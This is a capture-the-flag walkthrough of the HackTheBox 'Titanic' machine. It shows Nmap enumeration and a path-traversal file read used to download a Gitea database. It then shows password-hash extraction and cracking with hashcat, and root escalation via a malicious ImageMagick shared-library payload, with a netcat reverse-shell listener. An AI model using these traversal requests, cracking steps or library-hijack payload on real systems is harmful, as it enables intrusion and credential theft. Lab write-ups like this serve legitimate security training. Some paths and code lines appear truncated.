HackTheBox | Titanic Writeup
Table of Contents
1. Introduction
Machine Name: Titanic
Difficulty: Easy
Overview: This walk through details the process of exploiting the Titanic machine on HackTheBox. By enumerating services on Port 80 and Port 22, we discover a Gitea instance on a subdomain. An LFI (Local File Inclusion) vulnerability exposes Gitea’s database, enabling us to retrieve credentials for a user named “developer.” After logging in via SSH, we uncover a script that uses a vulnerable version of ImageMagick, which can be exploited to gain root access.
2. Enumeration
2.1 Nmap Scan
A basic Nmap scan reveals the open ports and services:
nmap -sC -sV -oN titanic.nmap
Sample output:
Nmap 7.95 scan initiated as: nmap -sCV -oA nmap/titanic
22/open/tcp//ssh//OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)/,
80/open/tcp//http//Apache httpd 2.x/
Only two services appear open:
- SSH (Port 22)
- HTTP (Port 80)
With no other ports available, the next logical step is to investigate the website on Port 80.
3. Initial Foothold
3.1 Website on Port 80

Visiting http://titanic.htb/
displays a simple website. One interesting endpoint is /book
, which returns a JSON file to download after filling out a form. Intercepting this request with Burp reveals a redirection to /download?ticket=rand-id.json
Local File Inclusion (LFI)
Testing for LFI by replacing rand-id.json
with ../../../../etc/passwd
successfully returns the contents of /etc/passwd
. This confirms that the site is vulnerable to LFI.
From /etc/passwd
, we see a developer
user, but grabbing their SSH key directly fails. We also extract /etc/hosts
to check for additional domains. We find:
Note: You can also use the LFI to directly grab
, but let’s follow the more interesting path of enumeratingdev.titanic.htb
3.2 Gitea Enumeration

Visiting http://dev.titanic.htb
opens a Gitea login page. You can register a new user to explore. In Gitea, there are two repositories of interest:
- docker-config
- flask-app
Reviewing flask-app confirms the code flaw that led to LFI, but no additional credentials.
Reviewing docker-config reveals Gitea is running in a Docker container and stores data in /home/developer/gitea/data
3.3 Extracting Gitea Database
By referencing Gitea’s documentation, we learn that all user data is stored in a gitea.db
SQLite file, and the file is in turn stored in /data/gitea
inside the docker image. The final path is:
Then using the LFI exploit, we can save this file locally:
curl -s "http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/gitea.db" -o gitea.db
Open gitea.db
in SQLite:
sqlite3 gitea.db
sqlite> .tables
sqlite> SELECT lower_name, passwd, salt FROM user;
We retrieve a hashed password (and salt) for the developer
3.4 Cracking the Developer’s Password
The hash can’t be directly cracked by hashcat, convert it manually or use gitea2hashcat.py script to format it:
hashcat -m 10900 gitea_hash.txt rockyou.txt
Eventually, we crack the hash and obtain the developer’s plaintext password.
4. User Shell
Armed with the cracked password, we can SSH in:
ssh developer@titanic.htb
Once inside, we can confirm user access by reading:
cat /home/developer/user.txt
Note: This confirms we have user-level access. However, our ultimate goal is to escalate privileges to root.
5. Privilege Escalation
5.1 Identifying Potential Priv-Esc Paths
A quick sudo -l
check reveals no direct sudo privileges. Exploring /opt
, we find a scripts
folder containing identify_images.sh
. Inspecting the file, we see it calls ImageMagick’s identify
command on uploaded images.
5.2 ImageMagick Exploit
The system uses ImageMagick 7.1.1–35, which is vulnerable to a known arbitrary code execution exploit. By crafting a malicious file (e.g., an .mvg
or .svg
), we can execute commands when identify
processes it.
Crafting the Payload
Below is a simplified example using a shared library approach, though a reverse shell payload is often used in practice. Compile a malicious .so
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
__attribute__((constructor)) void init(){
system("cat /root/root.txt > /tmp/root.txt");
Once ImageMagick processes this malicious file, it executes the code within the constructor, effectively copying root.txt
to /tmp/root.txt
. Alternatively, you can embed a reverse shell.
5.3 Root Access
If using a reverse shell, set up a listener:
nc -lvnp 4444
Once the script processes your crafted file, you’ll catch a shell running with root privileges. Verify root access:
cat /root/root.txt
Congratulations — you’ve now fully compromised the Titanic machine!
6. Conclusion
Key Takeaways
- Local File Inclusion (LFI) on the main website exposed critical files, including the Gitea SQLite database.
- Gitea Database Extraction allowed us to recover and crack the developer’s credentials.
- ImageMagick Exploit provided a route to root privileges through a malicious file crafted for code execution.
Flags Captured
Final Thoughts: The Titanic machine demonstrates how a single misconfiguration (LFI) can lead to full compromise, especially when sensitive application data (like a Gitea database) is exposed. The final pivot via ImageMagick underscores the importance of keeping software updated and restricting file processing operations.
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